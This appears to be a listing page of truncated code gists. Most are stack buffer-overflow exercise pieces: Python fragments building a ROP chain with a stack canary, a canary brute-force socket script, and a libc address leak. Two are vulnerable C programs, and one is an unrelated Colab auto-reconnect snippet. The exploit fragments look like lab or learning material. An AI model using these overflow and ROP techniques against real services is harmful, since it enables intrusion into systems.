This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from threading import Thread | |
from telnetlib import Telnet | |
from time import sleep | |
import socket | |
import sys | |
p64 = lambda x: pack("Q",x) # convert to little endian | |
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pop_rdi = BIN_BASE + 0x001643 | |
pop_rsi_r15 = BIN_BASE + 0x001641 | |
ret_gad = BIN_BASE + 0x1306 | |
write_plt = BIN_BASE + 0x1060 | |
write_got = BIN_BASE + 0x4030 | |
buf = b'A'*200 | |
buf+= p64(CANARY) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from threading import Thread | |
from telnetlib import Telnet | |
from time import sleep | |
import socket | |
import sys | |
p64 = lambda x: pack("Q",x) # convert to little endian | |
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import socket | |
TRGT = ('192.168.0.6', 8888) # ip and port | |
buf = b'A'*200 | |
buf+= b'B' # overwrite canary's first byte with B | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # create TCP socket | |
s.connect(TRGT) # connect to target |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <signal.h> | |
#include <string.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
void handle_request(int cfd){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// run in console | |
function ReconnectColab(){ | |
document.querySelector("#top-toolbar > colab-connect-button").shadowRoot.querySelector("#connect").click(); | |
console.log("Reconnect clicked."); | |
} | |
setInterval(ReconnectColab,120000); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from telnetlib import Telnet | |
import socket | |
import sys | |
TARGET = ("192.168.43.115",5555) # Target IP and PORT | |
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
leaks = resp.split(b"received.")[1] | |
printf_libc = u64(leaks[:6].ljust(8,b'\x00')) # first 6 bytes are printf address. Pad with '\x00' to unpack. | |
scanf_libc = u64(leaks[6:12].ljust(8,b'\x00')) # next 6 bytes are __isoc99_scanf address. Pad with '\x00' to unpack. | |
print("[*] Leaked libc printf:\t\t",hex(printf_libc)) # Print in hex format. | |
print("[*] Leaked libc __isoc99_scanf:\t",hex(scanf_libc)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from telnetlib import Telnet | |
import socket | |
import sys | |
TARGET = ("192.168.43.115",5555) # Target IP and PORT | |
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
void getMessage() | |
{ | |
char msg[200]; | |
printf("Enter message: "); | |
scanf("%s",msg); | |
// do something. | |
printf("The message has been received."); | |
} |
NewerOlder